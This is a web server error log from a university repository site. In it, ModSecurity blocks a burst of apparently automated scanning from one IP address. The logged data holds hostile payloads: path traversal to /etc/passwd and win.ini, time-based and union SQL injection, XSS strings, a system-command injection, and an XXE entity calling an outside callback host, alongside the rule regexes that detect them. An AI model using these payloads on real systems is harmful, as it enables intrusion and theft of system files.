[Tue Aug 29 11:41:03.606248 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAActbGwAAAAH"]
[Tue Aug 29 11:41:03.619689 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAaZ9moAAAAo"]
[Tue Aug 29 11:41:04.472381 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcYU9EAAAAp"]
[Tue Aug 29 11:41:05.355911 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcvBekAAAAJ"]
[Tue Aug 29 11:41:05.430489 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAYf-NMAAAAD"]
[Tue Aug 29 11:41:05.450231 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAYf-NQAAAAD"]
[Tue Aug 29 11:41:05.486878 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124cCo-f0AAAcoNPcAAAAF"]
[Tue Aug 29 11:41:06.568218 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124sCo-f0AAAcYU@QAAAAp"]
[Tue Aug 29 11:41:08.452986 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcqJIwAAAAG"]
[Tue Aug 29 11:41:09.377211 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAc2dOMAAAAN"]
[Tue Aug 29 11:41:09.626393 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAczXegAAAAL"]
[Tue Aug 29 11:41:10.442881 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAActbIAAAAAH"]
[Tue Aug 29 11:41:10.488348 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAcYVA0AAAAp"]
[Tue Aug 29 11:41:13.365748 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAAYf-PMAAAAD"]
[Tue Aug 29 11:41:15.503232 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAYf-QAAAAAD"]
[Tue Aug 29 11:41:18.653670 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAc2dQQAAAAN"]
[Tue Aug 29 11:41:19.349680 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAcqJMAAAAAG"]
[Tue Aug 29 11:41:19.387085 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAc0NcUAAAAM"]
[Tue Aug 29 11:41:20.391836 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAcyp4EAAAAK"]
[Tue Aug 29 11:41:20.418331 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO128MCo-f0AAAc0NdEAAAAM"]
[Tue Aug 29 11:41:20.599566 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc0NdQAAAAM"]
[Tue Aug 29 11:41:20.755294 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcqJNAAAAAG"]
[Tue Aug 29 11:41:20.795561 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/compress.php"] [unique_id "ZO128MCo-f0AAAc4EnUAAAAP"]
[Tue Aug 29 11:41:21.498382 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:xml. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:xml: <?xml version=\\x221.0\\x22 ?><!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY % sp SYSTEM \\x22http://cjmnbitjmimt14dgn26ghnpgzg6mfxjch.oast.site/xxe.xml\\x22>%sp;%param1;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/xmlpserver/convert"] [unique_id "ZO128cCo-f0AAAc0NeQAAAAM"]
[Tue Aug 29 11:41:21.944608 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128cCo-f0AAAcqJNYAAAAG"]
[Tue Aug 29 11:41:23.431480 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/v1/core/proxy/jsonprequest"] [unique_id "ZO1288Co-f0AAAQkBbgAAAAC"]
[Tue Aug 29 11:41:23.470287 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugins[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:plugins[]: ../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/src/redirect.php"] [unique_id "ZO1288Co-f0AAAcbSE4AAAAv"]
[Tue Aug 29 11:41:24.431477 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:pattern. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:pattern: <svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/config/postProcessing/testNaming"] [unique_id "ZO129MCo-f0AAAYf-RoAAAAD"]
[Tue Aug 29 11:41:24.501263 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:q: '>\\x22<svg/onload=confirm('q')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO129MCo-f0AAAc4EoMAAAAP"]
[Tue Aug 29 11:41:25.435189 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:api. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:api: '>\\x22<svg/onload=confirm('api')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO129cCo-f0AAAYf-SQAAAAD"]
[Tue Aug 29 11:41:25.515838 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[select]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[select]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO129cCo-f0AAAQkBcoAAAAC"]
